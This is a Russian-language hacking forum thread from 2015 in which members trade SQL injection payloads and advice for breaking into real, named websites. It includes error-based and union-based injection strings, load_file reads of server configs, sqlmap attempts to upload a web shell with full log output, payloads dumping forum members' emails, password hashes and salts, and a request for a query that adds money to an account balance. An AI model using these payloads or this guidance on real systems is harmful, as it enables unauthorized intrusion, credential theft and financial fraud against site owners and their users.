Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Что значит дальше базы дело не идёт? легко крутится через error based


    Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151443527442; session_id=1'or(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1


    Code:
    Ошибка базы данных. MySQL пишет:Duplicate column name '5.6.25-73.1-log'
     
    RedFern.89 and YaBtr like this.
  2. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    спасибо
    извини что беспокою
    перепробовал все команды которые в том списке - точнее пути
    прописывал
    полный путь мне так и не вывело
    root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
    осталось путь указать в sqlmap куда залиться, а пути у меня нет
    пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
    спасибо

    PS Там ось Gentoo

    просто через sqlmap
    я не могу скачать файл
    /etc/apache2/httpd.conf
    он пустой скачивается - то есть с ошибкой про размер
    при этом права на чтение есть.
    а через браузер %20union%20select%201,load_file(%27/etc/apache2/httpd.conf%27),3,4--
    открывает - но не видно там пути к папке сайта (

    и правильно ли я понял, что люди обладающие знаниями, могли бы залить бекдор + шелл только из этой строки ? без sqlmap и прочего ? - это так для себя что бы понимать уровень
    а так я хотел бы для начала с простых примеров - нет я назодил ресурсы где было все просто, но там было просто по методичке грубо говоря, здесь все получил а путь не могу получить (
    помогите плс
     
    #682 aldemko, 16 Oct 2015
    Last edited: 16 Oct 2015
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    все верно 1 запрос и там шел.
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    а не всегда, если нету папок на запись то никак.
    после root@localhost я бы пытался бы залить мини шел
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    я бы в первую очередь поискал phpmyadmin и phpinfo .....
     
  6. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    phpmyadmin есть
    root есть
    папки для записи есть
    нужен абсолютный путь сайта
    OxoTnik порекомендовал просмотреть сайт http://wiki.apache.org/httpd/DistrosDefaultLayout
    я пробовал подставить все пути для Gentoo списывал
    отображает данные, но абсолютного пути я там не нашел
    web server operating system: Linux Gentoo
    web application technology: Apache, PHP 5.3.29
    back-end DBMS: MySQL 5.0.12

    OxoTnik подскажи что мне нужно написать в скобках что бы путь появился если не сложно



    а не всегда, если нету папок на запись то никак.
    после root@localhost я бы пытался бы залить мини шел



    так мне бы абсолютный путь знать ((
    я никак не могу его вычислить

    как я понимаю
    (%27//etc/apache2/httpd.conf%27),3,4--
    должен вывести путь
    но там просто стандартный закоментированный файл (
     
    #686 aldemko, 16 Oct 2015
    Last edited: 16 Oct 2015
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  8. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    ты меня совсем озадачил
    скачал файлы эти, не открываются, под Thumbs.db скачал
    Thumbnail Database Viewer
    показывает список картинок
    я наверное баран, но я пути не вижу (*


    скажи ты там что-то видишь ? не говори как, просто если там есть информация, я буду искать как ее извлечь с таких файлов.
    спасибо
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  10. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    Спасибо но это я уже находил
    мне бы разобраться с той ссылкой что ты дал
    я пробовал подставлять разные значения подходящие под Gento но я так и не смог отобразить на сайте абсолютный путь ресурса (
     
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    вот вам раскрытие, с соседней сайта. лучше смотрите
    http://media-monitor.ru/admin

    www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--

    http://www.direct-line.ru/news_win....-monitor.ru/www/kernel/cfg/config.php'),3,4--

    или под ваш ресурс поулчается - http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4--
     
    #691 Br@!ns, 17 Oct 2015
    Last edited: 17 Oct 2015
    aldemko, kacergei and AlexG like this.
  12. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
    Я начал искать новые ресурсы для обучения и практики
    и так ресурс:
    http://www.aza.com.ua
    phpinfdo http://www.aza.com.ua/info.php
    страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html
    немного о сервере
    web server operating system: Windows
    web application technology: Apache 2.2.21, PHP 5.2.17
    back-end DBMS: MySQL 5.0

    current user: 'root@localhost'
    current database: 'test'
    current user is DBA: True

    uniscan по ключу --qwe
    показывает (если я правильно понял) папки с правами на запись
    | Directory check:
    | [+] CODE: 200 URL: http://www.aza.com.ua/banner/
    | [+] CODE: 200 URL: http://www.aza.com.ua/cart/
    | [+] CODE: 200 URL: http://www.aza.com.ua/conf/
    | [+] CODE: 200 URL: http://www.aza.com.ua/doc/
    | [+] CODE: 200 URL: http://www.aza.com.ua/email/
    | [+] CODE: 200 URL: http://www.aza.com.ua/edit/
    | [+] CODE: 200 URL: http://www.aza.com.ua/images/
    | [+] CODE: 200 URL: http://www.aza.com.ua/img/
    | [+] CODE: 200 URL: http://www.aza.com.ua/japan/
    | [+] CODE: 200 URL: http://www.aza.com.ua/news/
    | [+] CODE: 200 URL: http://www.aza.com.ua/orders/
    | [+] CODE: 200 URL: http://www.aza.com.ua/pma/
    | [+] CODE: 200 URL: http://www.aza.com.ua/quest/
    | [+] CODE: 200 URL: http://www.aza.com.ua/user/

    затем используя sqlmap-u сайт --os-cmd –v l
    выбираю 4 (php)
    затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
    Code:
    please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
    [22:27:14] [WARNING] unable to automatically parse any web server path
    [22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
    [22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
    [22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
    [22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
    [22:27:19] [WARNING] unable to upload the file stager on '/servis/'
    [22:27:19] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 8 times
    [22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
    
    
    подскажите что я не так делаю ?
    Проблема в пути который указываю в sqlmap
    или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
    или еще что то ?
    спасибо
     
    #692 aldemko, 17 Oct 2015
    Last edited: 17 Oct 2015
  13. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?
     
  14. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Первый вопрос - https://rdot.org/forum/showthread.php?t=60
     
    RedFern.89 likes this.
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    использовать другие векторы, самый максимальный вывод - через big into, 450+ символов. можно найти на рдоте остальные.
    автоматизировать с помощью любого яп, удобнее и проще выбрать php или python.
     
    _________________________
    RedFern.89 likes this.
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
    K800 and RedFern.89 like this.
  17. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Code:
    and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/
    Помогите преобразовать под другой вектор, пожалуйста
     
  18. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Предположу что выглядеть может как-то так:
    Code:
    +|(select!x-~0.FROM(select+(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 1,1)x)f)and'-1/
    Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
     
    RedFern.89 likes this.
  19. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Ребята как слить!

    Code:
    Request
    POST /pokladna.php3?zmen_pocet=1 HTTP/1.1
    Content-Length: 171
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://www.site/index.php3
    Cookie: zakaznik=54232320171015; mena=kc; PHPSESSID=e65098cea0bfe728376afb73aecdfa9a; poslednipokladna=http%3A%2F%2Fwww.xzone.cz%2Fnovinky.php3; PAPCookie_Imp_90792bb8=pap; A=0e64cc89bb5bb899f9c35e353152dda1; PAPCookie_Imp_=pap; M=d8a3af2bf6e34bc085d8077ee2f169e8; PAPCookie_Imp_11110001=pap; PAPCookie_Imp_11110002=pap; T_pap_sid=c5435b85e7695cc26819e282204671aa; PAPVisitorId=855a30dc32b3e6caeff8ed45d7f43e88; pinst=0ea803e135aa19014ec315b34f3f2567; I_pap_sid=7323f7a4ad1d3c86292e465bf78514b5; I=70f4c5f3bd4e0f3aeb9ca8d9847fefae; __utmt=1; __utma=105760714.564703462.1445165254.1445165254.1445165254.1; __utmb=105760714.11.10.1445165254; __utmc=105760714; __utmz=105760714.1445165254.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __utmli=info_title
    Host: www.site
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    druh%5b%5d=xbox360&idhry%5b%5d=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pocet%5b%5d=1

    http://i.shotnes.com/a/17/5h144kmo.ijb_562271d10c4de.png

    немогу уже больше( это как пример !! уязвимостей у меня есть очень много но ничего не получается !! если кто подробнее сможет помочь отпишите плз в icq 660668871 буду благодарен ! или хотябы тут как вот ету слить .
     
  20. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    ПРивет Всем. Извините за тупой вопрос. НО
    Имеем



    id
    pid
    email
    psw
    name
    family
    phone
    icq
    who
    count_rur
    curr_num
    top10_login
    notshow_top10_login
    dataadd administrator
    moderator
    last_data_auth
    last_data_update
    hash action

    Таблица adtram_users
    Нужно прописать запрос на добавление денег. Сюда: count_rur

    как ? Плиз -